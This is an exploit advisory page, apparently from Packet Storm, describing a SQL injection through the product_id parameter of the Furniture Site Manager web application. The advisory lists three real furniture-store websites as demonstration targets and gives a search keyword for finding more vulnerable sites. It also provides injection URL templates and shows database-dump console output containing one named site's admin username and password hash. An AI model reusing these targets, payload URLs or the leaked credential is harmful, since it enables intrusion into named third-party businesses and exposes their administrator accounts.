what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Furniture Site Manager SQL Injection

Furniture Site Manager SQL Injection
Posted Aug 27, 2014
Authored by KnocKout

Furniture Site Manager suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection
SHA-256 | eed7a3816e2b07e5e69779e732c4e7fb71add6fcbc27a1090a52dcf96ec86c59

Furniture Site Manager SQL Injection

Change Mirror Download
Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr (onlymail)
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org
[~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_
[Say]: Görmeyeli nasýlsýnýz beyler? xoron hala buralarý takip ettiðine eminim. arada bir selam ver geç buralara özletme :)
{çýtýrdan geri döndük biline...}
{THE H4X0RE SECURITY PROJECT continues!! ] (Turkey]

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Furniture Site Manager
|~Price : N/A
|~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~Keyword : "Powered By Furniture Site Manager"
|[~]Date : "27.AG.2014"
|[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA
http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| SQL Injection~~~~~~~~~~~}|

http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection}
http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL INJECTÝON}

Ex; http://curlysfurniture.com
[~] SQL Injecting..

http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command
the console
...
[20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture'
[20:56:26] [INFO] the SQL query used returns 2 entries
[20:56:26] [INFO] resumed: username
[20:56:26] [INFO] resumed: varchar(20)
[20:56:26] [INFO] resumed: password
[20:56:26] [INFO] resumed: varchar(40)
[20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture'
[20:56:26] [INFO] the SQL query used returns 1 entries
[20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c
[20:56:26] [INFO] resumed: admin
...
...
...
=============================================================
goodluck. greetz TURKEY
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close